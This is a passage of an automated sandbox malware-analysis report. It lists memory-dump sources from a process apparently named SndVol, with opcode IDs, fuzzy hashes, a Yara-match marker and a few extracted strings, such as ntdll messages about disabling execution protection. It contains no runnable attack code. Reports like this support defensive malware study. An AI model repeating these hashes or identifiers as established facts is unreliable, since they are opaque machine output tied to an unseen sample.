                                                                                                                                                  • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E5335146146BC231AE0DCC05F5BFBACDBD5B70F50032ABA649B1D0DA709901C7D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4af606323cb1ab9e370a815b935bc637f4b74b7455154dcfe5dacfd96c82aa38
                                                                                                                                                  • Instruction ID: 9c3136dd67839b4f21d0091e787d27370c628f61af69cbb8962980b39ec9e335
                                                                                                                                                  • Opcode Fuzzy Hash: 4af606323cb1ab9e370a815b935bc637f4b74b7455154dcfe5dacfd96c82aa38
                                                                                                                                                  • Instruction Fuzzy Hash: 4FF082B0A1024CEBDB04DFB9D916E5EB7B8AF44348F400069A911EB2D0EA74D901C759
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ed1e4a5c7b24fb0b5eb29bd25dc6f1cb0d50f62a22d648665f41b796edfe001
                                                                                                                                                  • Instruction ID: a8432ab7b5158ba578b6c6d501e1844d473a3692a8911a05f2905f3698248eea
                                                                                                                                                  • Opcode Fuzzy Hash: 3ed1e4a5c7b24fb0b5eb29bd25dc6f1cb0d50f62a22d648665f41b796edfe001
                                                                                                                                                  • Instruction Fuzzy Hash: B3F02E75A506869FD706CB1AC940F10BB39FF813A0F1483B8E5208BAA0CA20C800CB80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                  • Instruction ID: 46eed254fb25412a89883bcf48df5726683c70298e26df9e9492e49c7a69ff73
                                                                                                                                                  • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                  • Instruction Fuzzy Hash: F6E0E533514724ABE2210E86DC00F02FB69FF907F1F108535A558575D0CB64AC21CAD4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                                                  • Instruction ID: c7e05e2d754ca02f6de440be9b12be6a6dc86f4e060c437a6d5e88371bf0990e
                                                                                                                                                  • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                                                  • Instruction Fuzzy Hash: 92E06DB2610210FFD755CB59DD01FA673ACEB80764F900268B515A30E0DAB0BE40CA65
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                                                                  • Instruction ID: 3c9ac4bd2d128331b6d8bb63d4a7160c075554c9cefcedd5a39def30e4eb9e05
                                                                                                                                                  • Opcode Fuzzy Hash: 1fbc1a57687687429949ef68cda6319bf2983e9682e37ceea575ce143fddd903
                                                                                                                                                  • Instruction Fuzzy Hash: 1BE02236992720ABEB365F08ED20F4676B1AF90F90F4104B9A9014B960C7209C80CA81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                                                                  • Instruction ID: 3fdb35ab6734834c9a969268cc82c8c41f4bb905b28125617e1e98129a9ac323
                                                                                                                                                  • Opcode Fuzzy Hash: 156e13366ecf80be3081f2b2274d6134dfdc911ce20f9e366b099422a7fcba0b
                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0EC72201955BFEB170EA6DC80E66FB6AFBD46A5B640035F52482530CB62AC61E690
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9182e23970506784c53fe625b04b9e108e9d2abe69a6f584228bdb9fb727519e
                                                                                                                                                  • Instruction ID: dfd4d71685ee9840b9fdb40fee966927f4d9ae196f62015f87ac6812fa10f124
                                                                                                                                                  • Opcode Fuzzy Hash: 9182e23970506784c53fe625b04b9e108e9d2abe69a6f584228bdb9fb727519e
                                                                                                                                                  • Instruction Fuzzy Hash: A0E092322105146BC3119A29DD10B8AB3EEEFE1764F410125E20497A90CB70BC02C799
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 75062976ac46d9978c66ca3472fc097db444f9f51dc1f86482c4dfd9dc6b2e7b
                                                                                                                                                  • Instruction ID: f8e56f2485dd572f079d54e1a69f9b438e87769519358af09423ca52beadf163
                                                                                                                                                  • Opcode Fuzzy Hash: 75062976ac46d9978c66ca3472fc097db444f9f51dc1f86482c4dfd9dc6b2e7b
                                                                                                                                                  • Instruction Fuzzy Hash: 67E04F32B2434A5BF391D618D58271277A9F7587DCF204835E641CBD82E629E952CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                  • Instruction ID: 6cfa50899baddb2343723f51cbba0d050fff7d3f23d5a5ccf8d7347171c4eeb9
                                                                                                                                                  • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                  • Instruction Fuzzy Hash: 3CE0CD31244314BBE7131E40DC00F597765DF907E4F504035FA085A650C5719C51D6D5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c3517c12ca67d498fe852c9785dc16cff79966b106d82a58b021c7e76aa709da
                                                                                                                                                  • Instruction ID: 4c312b6f1ff4ce45d5358a1064b075325e86248947c67d892c1ebfca7bad3ca3
                                                                                                                                                  • Opcode Fuzzy Hash: c3517c12ca67d498fe852c9785dc16cff79966b106d82a58b021c7e76aa709da
                                                                                                                                                  • Instruction Fuzzy Hash: 71F03278211B84CBE30ACF05C1E1B1133BAFB85B80F800158C44A8BBA1C73AAD42CA80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 567c7d1a26a07e01f29db5989ade6dca788771ebd87a95dfba10e40db38a2c29
                                                                                                                                                  • Instruction ID: f367a07e714d1bcc4d63d7de6c2c491d553e6950eda4e1d508a78d39012bc84a
                                                                                                                                                  • Opcode Fuzzy Hash: 567c7d1a26a07e01f29db5989ade6dca788771ebd87a95dfba10e40db38a2c29
                                                                                                                                                  • Instruction Fuzzy Hash: D4E08C3CA1139D9BE724CA1A8080B95BBD55B886A8F188035A4284B551CB38D880CA21
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                  • Instruction ID: 62e6762d994fdd3c1e2c0366976c3e7dbb4956c9f3b3f8a6a58d700c408916b5
                                                                                                                                                  • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                  • Instruction Fuzzy Hash: 0FD05E31661760AFC7325F11EE01F867ABAAFD0F10F850538B001668F0D6A1ED85CA96
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be3f2f046da2344e63058b16529e9c20d06010dfddd3f2204fabba1fde9a1a40
                                                                                                                                                  • Instruction ID: 7094758dfa51a49c93828ff4a3b0a9b7684100632e0940ce5e971ff35d0a9ac6
                                                                                                                                                  • Opcode Fuzzy Hash: be3f2f046da2344e63058b16529e9c20d06010dfddd3f2204fabba1fde9a1a40
                                                                                                                                                  • Instruction Fuzzy Hash: 4ED01776C21665EFDB228B49CE11F9A76B6EF94B58F9500649800A7650C2BA9C11CA80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48316764af5051ee035ec31463eac1568ce015a01042a09004bdf840a79b8bde
                                                                                                                                                  • Instruction ID: 19ac1d9d828f1cbb2e731c49a2726875b530c294a7988ebda41703e930cfaa14
                                                                                                                                                  • Opcode Fuzzy Hash: 48316764af5051ee035ec31463eac1568ce015a01042a09004bdf840a79b8bde
                                                                                                                                                  • Instruction Fuzzy Hash: A0C08017A471C4419B155FAC35541BCFB30A9C7521B1D21DFCC5C77409551684159698
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 307bdae496b1629aa071e6d7971fb3d8e018be099ba395b1f02024d1b346273a
                                                                                                                                                  • Instruction ID: ac539c6b516a1a2c60a7d5af666edba732419ed4d769fe77788669b671e40ddf
                                                                                                                                                  • Opcode Fuzzy Hash: 307bdae496b1629aa071e6d7971fb3d8e018be099ba395b1f02024d1b346273a
                                                                                                                                                  • Instruction Fuzzy Hash: 55E0E236190AC5DFDB32CB04C944FA873A1FB40F80F8504B0E1094BDB5CBBC9984EA40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                  • Instruction ID: afa0d89009ef9f4e58964b8ff689010856ba3d7d1dc6cae99c4b605d1298d43a
                                                                                                                                                  • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                  • Instruction Fuzzy Hash: 47D01779951AC48FE317CB14C161B407BF4F705B80F850098E04747AA2C27C9D85CB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                                                                                                                                  • Instruction ID: d280e4a21b08f2235ee1206b81e7ad81e76626f6c00715903ad2eab999dd3819
                                                                                                                                                  • Opcode Fuzzy Hash: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                                                                                                                                  • Instruction Fuzzy Hash: 99C08033084248BBCB135F45CC01F157F29F794760F044010F5040A571C532DD71E744
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                  • Instruction ID: 0baf30e102dccd2adb25fc699e77bbf7db1d41dea705a144fde5f423a7130359
                                                                                                                                                  • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                  • Instruction Fuzzy Hash: 0BC080745715407EEF074700CD14B1C35506F10745FD0017C6A807A491C399E402C614
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                                                                                                                  • Instruction ID: 3d26b443dc0e0264aab50bc7cd3afb99e84b4d3895c35f55294b290220e19b69
                                                                                                                                                  • Opcode Fuzzy Hash: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                                                                                                                  • Instruction Fuzzy Hash: 13C01231C511249BCF219E15CD44A89B779BB903C0F9100A0D004B3550D634DE41CA90
Memory Dump Source
• Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
• Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
Similarity
• Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
• Instruction ID: 0227428e9d7443a96b6ed9104ab79412c679df61acaef2118f51c7ab6b271011
• Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
• Instruction Fuzzy Hash: 0CC08C32080248BBC7125E81CC00F067B2AE790B60F400020B6040A5708532ECA0D988
Similarity
• Opcode ID: 95fccadb08f9606dfcd38af2f15b62c32522055e8e772f632f64d198668e5d87
• Instruction ID: ec6f299cdbe6452244b46eed101f9799a4799f1b1ef2b2c95f93e1407d478e2c
• Opcode Fuzzy Hash: 95fccadb08f9606dfcd38af2f15b62c32522055e8e772f632f64d198668e5d87
• Instruction Fuzzy Hash: F1D012B092A5C4AED30ACB3894415017EE1FB09B80B4644ADE046CB701C624510AC616
Similarity
• Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
• Instruction ID: 6967f2aeb636b258f5083217be94d18a9baca8802ead2c97ec88c993a5139f40
• Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
• Instruction Fuzzy Hash: 41A022320B0880EFCB0BAF80CE00F00B3B0FF80B80FC008B0E00002830822CE800CA00
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: b4bab2181c0768562ddf9adc4c068747efe8e68414f48282232668f51f07b74d
• Instruction ID: b534ce9989e1fde72ebbf19ae809bafca455bc21d24b8aa660aebfc968c58f04
• Opcode Fuzzy Hash: b4bab2181c0768562ddf9adc4c068747efe8e68414f48282232668f51f07b74d
• Instruction Fuzzy Hash: AA51E6BAA04216AFEB10CF9CCC8097EF7B8BB482847508179E594D3681D634DE54CBE5
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 05c90345145a08336f67c99b8a0049a8af31982dbc21723cfe9a918468a8f2c9
• Instruction ID: 33dff18346e72b9b820e1792c3eb85a908e93f6b653c946e6ec760b8cd0d7887
• Opcode Fuzzy Hash: 05c90345145a08336f67c99b8a0049a8af31982dbc21723cfe9a918468a8f2c9
• Instruction Fuzzy Hash: 11512A75A00745AEDB25EF9CCC8057FBBFCDF442C0B608469E496C3645EA74DA40CB65
Strings
• ExecuteOptions, xrefs: 366046A0
• Execute=1, xrefs: 36604713
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36604742
• CLIENT(ntdll): Processing section info %ws..., xrefs: 36604787
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36604655
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36604725
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 366046FC
Similarity
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: dca220afe5506839d147870cb2d20bbc7e334dd61364d01a029e38a4b3db0d88
• Instruction ID: c7331871668c46684a814b19991c52534811d3b209a964e2c390157deb1f3c20
• Opcode Fuzzy Hash: dca220afe5506839d147870cb2d20bbc7e334dd61364d01a029e38a4b3db0d88
• Instruction Fuzzy Hash: BD5138B5A0021DBBEB109FE5DC89FAE7BA8EF44384F5000B9D505A7590EB709E45CF61
Similarity
